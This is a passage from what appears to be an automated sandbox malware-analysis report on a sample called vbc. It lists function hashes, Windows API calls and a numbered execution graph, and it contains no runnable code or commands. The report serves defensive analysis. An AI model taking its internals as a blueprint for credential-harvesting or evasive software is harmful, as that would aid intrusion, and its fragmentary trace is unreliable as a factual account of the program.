                                                              • Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                              • Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: History
                                                              • API String ID: 1872909662-3892791767
                                                              • Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                              • Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
                                                              • Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                              • Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileNameSavewcscpy
                                                              • String ID: X
                                                              • API String ID: 3080202770-3081909835
                                                              • Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                              • Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
                                                              • Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                              • Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040AC9A
                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: "
                                                              • API String ID: 568519121-123907689
                                                              • Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                              • Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
                                                              • Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                              • Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
                                                              • memset.MSVCRT ref: 004017F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                              • Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
                                                              • Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                              • Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileNameOpenwcscpy
                                                              • String ID: X
                                                              • API String ID: 3246554996-3081909835
                                                              • Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                              • Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
                                                              • Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                              • Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                              • wcsrchr.MSVCRT ref: 0040AB86
                                                              • wcscat.MSVCRT ref: 0040AB9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                              • Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
                                                              • Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                              • Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                              • Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
                                                              • Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                              • Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcslen.MSVCRT ref: 00407EF0
                                                                • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                              • memcpy.MSVCRT ref: 00407F5D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: be5b8af5a35c63ac2b54e28cf5c138f71d92d229ecb0d3f8242589eaee37ec67
                                                              • Instruction ID: 7e4f8ba4ba14ff744b1d1ae1a3210968bf085ae1c99a6b147d894c05d7fb7a00
                                                              • Opcode Fuzzy Hash: be5b8af5a35c63ac2b54e28cf5c138f71d92d229ecb0d3f8242589eaee37ec67
                                                              • Instruction Fuzzy Hash: 9E21AC71504605EFD720DF18C880C9AB7F4EF443247108A2EF866AB6A1D734F916CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 5627105beb9839867dadd41f27e32736bc5f7ac3a9c0d4926a9892ae2fbb8899
                                                              • Instruction ID: 8f402eb808e7ad555a909232128954833d185930e872f23c51b71e42452eb786
                                                              • Opcode Fuzzy Hash: 5627105beb9839867dadd41f27e32736bc5f7ac3a9c0d4926a9892ae2fbb8899
                                                              • Instruction Fuzzy Hash: B121F7B0A017009FD7258F6A8545A52FBE5FF90311B29C9AFE108CBAB2D7B8C800CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 9e8432d91a2e77195b943aac56cc1a8ac5dc494c092db0d985250eee56e0d8ac
                                                              • Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
                                                              • Opcode Fuzzy Hash: 9e8432d91a2e77195b943aac56cc1a8ac5dc494c092db0d985250eee56e0d8ac
                                                              • Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
                                                              • malloc.MSVCRT ref: 00414C36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
                                                              • free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: d1487a7e863e70dc2f019b884fb27329593cc5dc8913d140b28b23ec81489219
                                                              • Instruction ID: ac963edc179c34f330cc22ede2b288a34a1f5b158d5d5a2152ff40f2e70c1069
                                                              • Opcode Fuzzy Hash: d1487a7e863e70dc2f019b884fb27329593cc5dc8913d140b28b23ec81489219
                                                              • Instruction Fuzzy Hash: 9AF0A77220521E3BE61026A55C40D7B778CEB86375B10072BB910E21C1FD59D80006B4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:11.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:3%
                                                              Total number of Nodes:1485
                                                              Total number of Limit Nodes:45

                                                              Graph

                                                              execution_graph 5540 411654 5559 411840 5540->5559 5542 411660 GetModuleHandleA 5543 411672 __set_app_type __p__fmode __p__commode 5542->5543 5545 411704 5543->5545 5546 411718 5545->5546 5547 41170c __setusermatherr 5545->5547 5560 41182c _controlfp 5546->5560 5547->5546 5549 41171d _initterm __getmainargs _initterm 5550 411774 GetStartupInfoA 5549->5550 5552 4117a8 GetModuleHandleA 5550->5552 5561 40b9ad 5552->5561 5556 4117d2 exit 5557 4117d9 _cexit 5556->5557 5558 41180e 5557->5558 5559->5542 5560->5549 5612 404837 LoadLibraryA 5561->5612 5563 40b9c9 5600 40b9cd 5563->5600 5620 40edac 5563->5620 5565 40b9d8 5624 40b785 ??2@YAPAXI 5565->5624 5572 40ba41 5661 40823d memset 5572->5661 5573 40ba2d 5656 40836e memset 5573->5656 5578 40bbe9 ??3@YAXPAX 5580 40bc07 DeleteObject 5578->5580 5581 40bc1b 5578->5581 5579 406dfb _stricmp 5582 40ba57 5579->5582 5580->5581 5685 406a4e free free 5581->5685 5584 40ba70 EnumResourceTypesA 5582->5584 5585 40ba5b RegDeleteKeyA 5582->5585 5587 40bab0 5584->5587 5588 40ba98 MessageBoxA 5584->5588 5585->5578 5586 40bc2c 5686 40462e 5586->5686 5590 40bb09 CoInitialize 5587->5590 5666 40b8d7 5587->5666 5588->5578 5683 40b70a RegisterClassA CreateWindowExA 5590->5683 5595 40bb19 ShowWindow UpdateWindow LoadAcceleratorsA 5684 40ad9d PostMessageA 5595->5684 5597 40bb07 5597->5590 5598 40baca ??3@YAXPAX 5598->5581 5601 40baed DeleteObject 5598->5601 5600->5556 5600->5557 5601->5581 5604 40bb61 GetMessageA 5605 40bbe3 CoUninitialize 5604->5605 5606 40bb75 5604->5606 5605->5578 5607 40bb7b TranslateAcceleratorA 5606->5607 5609 40bba1 IsDialogMessageA 5606->5609 5610 40bbad IsDialogMessageA 5606->5610 5607->5606 5608 40bbd5 GetMessageA 5607->5608 5608->5605 5608->5607 5609->5608 5609->5610 5610->5608 5611 40bbbf TranslateMessage DispatchMessageA 5610->5611 5611->5608 5613 404862 GetProcAddress 5612->5613 5614 40488a #17 5612->5614 5615 40487b FreeLibrary 5613->5615 5619 404872 5613->5619 5618 404886 5614->5618 5615->5614 5615->5618 5616 4048b1 5616->5563 5617 40489a MessageBoxA 5617->5563 5618->5616 5618->5617 5619->5615 5621 40edb5 LoadLibraryA 5620->5621 5622 40edda 5620->5622 5621->5622 5623 40edc9 GetProcAddress 5621->5623 5622->5565 5623->5622 5625 40b7ad ??2@YAPAXI 5624->5625 5627 40b7cb 5625->5627 5629 40b7d2 5625->5629 5698 404016 5627->5698 5630 40b80b 5629->5630 5631 40b7fe DeleteObject 5629->5631 5690 406252 5630->5690 5631->5630 5633 40b810 5693 401000 5633->5693 5637 40b83c 5638 406c87 5637->5638 5719 406a4e free free 5638->5719 5641 406cc2 5643 406da7 5641->5643 5644 406b25 malloc memcpy free free 5641->5644 5646 406d45 free 5641->5646 5651 406dcf 5641->5651 5723 406a74 strlen 5641->5723 5733 4060fa 5641->5733 5643->5651 5741 406b25 5643->5741 5644->5641 5646->5641 5650 406a74 7 API calls 5650->5651 5720 406b5b 5651->5720 5652 406dfb 5653 406e22 5652->5653 5654 406e03 5652->5654 5653->5572 5653->5573 5654->5653 5655 406e0c _stricmp 5654->5655 5655->5653 5655->5654 5746 408348 5656->5746 5658 40839d 5751 40827a 5658->5751 5662 408348 3 API calls 5661->5662 5663 40826c 5662->5663 5773 4081b5 5663->5773 5787 4023d4 5666->5787 5672 40b936 5676 40b9a7 5672->5676 5828 40af17 memset GetModuleFileNameA strrchr 5672->5828 5673 40b93b 5876 40b841 _stricmp 5673->5876 5676->5597 5676->5598 5679 40b955 5855 409b32 5679->5855 5683->5595 5684->5604 5685->5586 5687 404634 free 5686->5687 5688 40463b 5686->5688 5687->5688 5689 406a4e free free 5688->5689 5689->5600 5705 406191 memset strcpy 5690->5705 5692 406269 CreateFontIndirectA 5692->5633 5694 40102c 5693->5694 5695 401030 LoadIconA 5694->5695 5696 40100d strncat 5694->5696 5697 4017a4 strcpy 5695->5697 5696->5694 5697->5637 5706 4084ce 5698->5706 5702 4040bc 5717 4046d7 strcpy 5702->5717 5704 40414f 5704->5629 5705->5692 5718 406549 memset 5706->5718 5708 4084e1 ??2@YAPAXI 5709 4084f5 ??2@YAPAXI 5708->5709 5711 408516 ??2@YAPAXI 5709->5711 5713 408537 ??2@YAPAXI 5711->5713 5715 40401f 5713->5715 5716 4046d7 strcpy 5715->5716 5716->5702 5717->5704 5718->5708 5719->5641 5721 406b61 free 5720->5721 5722 406b6b 5720->5722 5721->5722 5722->5652 5724 406aa7 5723->5724 5725 406a9e free 5723->5725 5727 4060fa 3 API calls 5724->5727 5726 406ab1 5725->5726 5728 406ac1 free 5726->5728 5729 406aca 5726->5729 5727->5726 5731 406ad6 memcpy 5728->5731 5730 4060fa 3 API calls 5729->5730 5732 406ad5 5730->5732 5731->5641 5732->5731 5734 406101 malloc 5733->5734 5735 406147 5733->5735 5737 406122 5734->5737 5738 40613d 5734->5738 5735->5641 5739 406136 free 5737->5739 5740 406126 memcpy 5737->5740 5738->5641 5739->5738 5740->5739 5742 406b33 free 5741->5742 5743 406b3e 5741->5743 5744 406b49 5742->5744 5745 4060fa 3 API calls 5743->5745 5744->5650 5745->5744 5762 406160 GetModuleFileNameA 5746->5762 5748 40834e strrchr 5749 408360 strcat 5748->5749 5750 40835d 5748->5750 5749->5658 5750->5749 5763 4118a0 5751->5763 5756 407e55 3 API calls 5757 4082c2 EnumResourceNamesA EnumResourceNamesA strcpy memset 5756->5757 5758 40830e LoadStringA 5757->5758 5759 408324 5758->5759 5759->5758 5761 40833c 5759->5761 5770 407ec3 _itoa 5759->5770 5761->5578 5762->5748 5764 408287 strcpy strcpy 5763->5764 5765 407e55 5764->5765 5766 4118a0 5765->5766 5767 407e62 memset GetPrivateProfileStringA 5766->5767 5768 407ebd 5767->5768 5769 407ead WritePrivateProfileStringA 5767->5769 5768->5756 5769->5768 5771 407e55 3 API calls 5770->5771 5772 407ef5 5771->5772 5772->5759 5783 40614b GetFileAttributesA 5773->5783 5775 4081be 5776 4081c3 strcpy strcpy GetPrivateProfileIntA 5775->5776 5777 408237 5775->5777 5784 407dc1 GetPrivateProfileStringA 5776->5784 5777->5579 5779 408212 5785 407dc1 GetPrivateProfileStringA 5779->5785 5781 408223 5786 407dc1 GetPrivateProfileStringA 5781->5786 5783->5775 5784->5779 5785->5781 5786->5777 5894 40875c 5787->5894 5790 401e8b memset 5933 40ee59 5790->5933 5793 401ee4 5963 4062ad strcpy 5793->5963 5794 401ef6 5948 40614b GetFileAttributesA 5794->5948 5797 401f08 strlen strlen 5799 401f37 5797->5799 5800 401f4a 5797->5800 5801 4062ad 4 API calls 5799->5801 5949 40614b GetFileAttributesA 5800->5949 5801->5800 5803 401f57 5950 401c97 5803->5950 5806 401f97 5962 40eb3f RegOpenKeyExA 5806->5962 5807 401c97 7 API calls 5807->5806 5809 401fb3 5810 4021a9 5809->5810 5811 401fbe memset 5809->5811 5812 4021b7 ExpandEnvironmentStringsA 5810->5812 5816 4021ca _stricmp 5810->5816 5966 40ec05 RegEnumKeyExA 5811->5966 5975 40614b GetFileAttributesA 5812->5975 5815 4021a0 RegCloseKey 5815->5810 5816->5672 5816->5673 5817 401ffb atoi 5818 402011 memset memset sprintf 5817->5818 5826 401feb 5817->5826 5967 40ebc1 5818->5967 5821 402187 5821->5815 5822 402098 memset memset strlen strlen 5822->5826 5823 4062ad strlen strcat strcpy strcat 5823->5826 5824 4020ff strlen strlen 5824->5826 5825 40614b GetFileAttributesA 5825->5826 5826->5815 5826->5817 5826->5821 5826->5822 5826->5823 5826->5824 5826->5825 5827 402189 strcpy 5826->5827 5974 40ec05 RegEnumKeyExA 5826->5974 5827->5815 5829 40af67 5828->5829 5830 40af6a strcat strcpy strcpy 5828->5830 5829->5830 5831 40afe2 5830->5831 5832 40b057 5831->5832 5833 40b047 GetWindowPlacement 5831->5833 5834 40b07d 5832->5834 6003 401896 5832->6003 5833->5832 5996 408671 5834->5996 5838 40a5ac 5839 40a60b 5838->5839 5845 40a5c0 5838->5845 6019 405e2c LoadCursorA SetCursor 5839->6019 5841 40a610 6020 4047a0 5841->6020 6028 403c3d 5841->6028 6100 40eb3f RegOpenKeyExA 5841->6100 6101 4047f1 5841->6101 6104 40e894 5841->6104 5842 40a5c7 _mbsicmp 5842->5845 5843 40a624 5844 406dfb _stricmp 5843->5844 5848 40a634 5844->5848 5845->5839 5845->5842 6107 40a119 5845->6107 5846 40a67e SetCursor 5846->5679 5848->5846 5849 40a675 qsort 5848->5849 5849->5846 5856 409b46 5855->5856 5857 40892d 3 API calls 5855->5857 5858 409b57 GetStdHandle 5856->5858 5859 409b4e 5856->5859 5857->5856 5861 409b54 5858->5861 7115 405ee4 CreateFileA 5859->7115 5862 409c65 5861->5862 5863 409b6d 5861->5863 5864 405f41 9 API calls 5862->5864 7116 405e2c LoadCursorA SetCursor 5863->7116 5866 409c6e 5864->5866 5889 40b0c2 5866->5889 5867 409b7a 5868 409bbf 5867->5868 5874 409bd9 5867->5874 7117 4090ae 5867->7117 5868->5874 7123 4091cb 5868->7123 5871 409c0e 5872 409c57 SetCursor 5871->5872 5873 409c4e CloseHandle 5871->5873 5872->5866 5873->5872 5874->5871 7133 405f41 5874->7133 5877 40b852 5876->5877 5878 40b856 _stricmp 5876->5878 5877->5672 5879 40b867 5878->5879 5880 40b86b _stricmp 5878->5880 5879->5672 5881 40b880 _stricmp 5880->5881 5882 40b87c 5880->5882 5883 40b891 5881->5883 5884 40b895 _stricmp 5881->5884 5882->5672 5883->5672 5885 40b8a6 5884->5885 5886 40b8aa _stricmp 5884->5886 5885->5672 5887 40b8bb 5886->5887 5888 40b8bf _mbsicmp 5886->5888 5887->5672 5888->5672 5890 40b0d9 5889->5890 5891 40b0cd 5889->5891 5890->5676 7149 4041af 5891->7149 5906 408572 5894->5906 5897 4087c0 memcpy memcpy 5898 40881a 5897->5898 5898->5897 5899 4078ff 12 API calls 5898->5899 5900 408858 ??2@YAPAXI ??2@YAPAXI 5898->5900 5899->5898 5901 408894 ??2@YAPAXI 5900->5901 5903 4088cb 5900->5903 5901->5903 5916 4086dc 5903->5916 5905 4023e3 5905->5790 5907 408584 5906->5907 5908 40857d ??3@YAXPAX 5906->5908 5909 408592 5907->5909 5910 40858b ??3@YAXPAX 5907->5910 5908->5907 5911 4085a3 5909->5911 5912 40859c ??3@YAXPAX 5909->5912 5910->5909 5913 4085c3 ??2@YAPAXI ??2@YAPAXI 5911->5913 5914 4085b3 ??3@YAXPAX 5911->5914 5915 4085bc ??3@YAXPAX 5911->5915 5912->5911 5913->5897 5914->5915 5915->5913 5917 406b5b free 5916->5917 5918 4086e5 5917->5918 5919 406b5b free 5918->5919 5920 4086ed 5919->5920 5921 406b5b free 5920->5921 5922 4086f5 5921->5922 5923 406b5b free 5922->5923 5924 4086fd 5923->5924 5925 406b25 4 API calls 5924->5925 5926 408710 5925->5926 5927 406b25 4 API calls 5926->5927 5928 40871a 5927->5928 5929 406b25 4 API calls 5928->5929 5930 408724 5929->5930 5931 406b25 4 API calls 5930->5931 5932 40872e 5931->5932 5932->5905 5934 40edac 2 API calls 5933->5934 5935 40ee68 5934->5935 5936 40ee9b memset 5935->5936 5976 406278 5935->5976 5937 40eebb 5936->5937 5979 40eb3f RegOpenKeyExA 5937->5979 5941 401ec0 strlen strlen 5941->5793 5941->5794 5942 40eee8 5943 40ef1d strcpy 5942->5943 5980 40eddb 5942->5980 5943->5941 5945 40eef9 5984 40eb80 RegQueryValueExA 5945->5984 5947 40ef11 RegCloseKey 5947->5943 5948->5797 5949->5803 5985 40eb3f RegOpenKeyExA 5950->5985 5952 401cb2 5953 401d13 5952->5953 5986 40eb80 RegQueryValueExA 5952->5986 5953->5806 5953->5807 5955 401cd0 5956 401cd7 strchr 5955->5956 5957 401d0a RegCloseKey 5955->5957 5956->5957 5958 401ceb strchr 5956->5958 5957->5953 5958->5957 5959 401cfa 5958->5959 5987 4060d0 strlen 5959->5987 5961 401d07 5961->5957 5962->5809 5990 405f1f strlen 5963->5990 5966->5826 5994 40eb3f RegOpenKeyExA 5967->5994 5969 40ebd7 5970 40ec00 5969->5970 5995 40eb80 RegQueryValueExA 5969->5995 5970->5826 5972 40ebef RegCloseKey 5972->5970 5974->5826 5975->5816 5977 406287 GetVersionExA 5976->5977 5978 406298 5976->5978 5977->5978 5978->5936 5978->5941 5979->5942 5982 40ede0 5980->5982 5981 40ee4d strcpy 5981->5945 5982->5981 5983 40ee30 5982->5983 5983->5945 5984->5947 5985->5952 5986->5955 5988 4060e1 5987->5988 5989 4060e4 memcpy 5987->5989 5988->5989 5989->5961 5991 405f2a 5990->5991 5992 405f3e strcat 5990->5992 5991->5992 5993 405f31 strcat 5991->5993 5992->5794 5993->5992 5994->5969 5995->5972 5997 408680 5996->5997 5999 40868e 5996->5999 6010 408441 5997->6010 6000 4086d9 5999->6000 6001 4086cb 5999->6001 6000->5838 6015 4083b1 6001->6015 6004 40191f 6003->6004 6005 4018a5 6003->6005 6004->5834 6005->6004 6006 4018d9 GetSystemMetrics 6005->6006 6006->6004 6007 4018ed GetSystemMetrics 6006->6007 6007->6004 6008 4018fb 6007->6008 6008->6004 6009 401904 SetWindowPos 6008->6009 6009->6004 6011 408450 memset 6010->6011 6012 4084a7 6010->6012 6011->6012 6013 408467 SendMessageA 6011->6013 6012->5999 6014 408492 6013->6014 6014->6012 6014->6013 6016 40843b 6015->6016 6017 4083c0 6015->6017 6016->6000 6017->6016 6018 408404 SendMessageA 6017->6018 6018->6017 6019->5841 6021 4047f1 FreeLibrary 6020->6021 6022 4047a7 LoadLibraryA 6021->6022 6023 4047b8 GetProcAddress 6022->6023 6024 4047da 6022->6024 6023->6024 6025 4047d0 6023->6025 6026 4047ed 6024->6026 6027 4047f1 FreeLibrary 6024->6027 6025->6024 6026->5843 6027->6026 6029 40e894 FreeLibrary 6028->6029 6030 403c57 LoadLibraryA 6029->6030 6031 403c9b 6030->6031 6032 403c6b GetProcAddress 6030->6032 6034 40e894 FreeLibrary 6031->6034 6032->6031 6033 403c85 6032->6033 6033->6031 6037 403c92 6033->6037 6035 403ca2 6034->6035 6036 4047a0 3 API calls 6035->6036 6038 403cad 6036->6038 6037->6035 6117 4036cc 6038->6117 6041 4036cc 27 API calls 6042 403cc1 6041->6042 6043 4036cc 27 API calls 6042->6043 6044 403ccb 6043->6044 6045 4036cc 27 API calls 6044->6045 6046 403cd5 6045->6046 6129 40754d 6046->6129 6054 403d0c 6055 403d1e 6054->6055 6311 402bb8 memset 6054->6311 6175 40eb3f RegOpenKeyExA 6055->6175 6058 403d31 6059 403d43 6058->6059 6060 402bb8 37 API calls 6058->6060 6176 402c44 6059->6176 6060->6059 6063 406278 GetVersionExA 6064 403d58 6063->6064 6194 40eb3f RegOpenKeyExA 6064->6194 6066 403d78 6067 403d88 6066->6067 6319 402b09 memset 6066->6319 6195 40eb3f RegOpenKeyExA 6067->6195 6070 403dae 6071 403dbe 6070->6071 6072 402b09 43 API calls 6070->6072 6196 40e8ab 6071->6196 6072->6071 6075 4047f1 FreeLibrary 6076 403dd9 6075->6076 6200 402fc2 6076->6200 6079 402fc2 34 API calls 6080 403df1 6079->6080 6216 40329e 6080->6216 6089 403e2c 6091 403e64 6089->6091 6092 403e37 strcpy 6089->6092 6265 40d9f9 6091->6265 6093 40d37a 144 API calls 6092->6093 6093->6091 6100->5843 6102 404805 FreeLibrary 6101->6102 6103 40480f 6101->6103 6102->6103 6103->5843 6105 40e8aa 6104->6105 6106 40e89f FreeLibrary 6104->6106 6105->5843 6106->6105 7108 40892d ??2@YAPAXI 6107->7108 6109 40a127 6110 40a13e strlen 6109->6110 6114 40a17e 6109->6114 6112 40a14a atoi 6110->6112 6110->6114 6111 40a15b 6111->5845 6112->6111 6113 40a192 _mbsicmp _mbsicmp 6113->6114 6114->6113 6116 40a1ec 6114->6116 6115 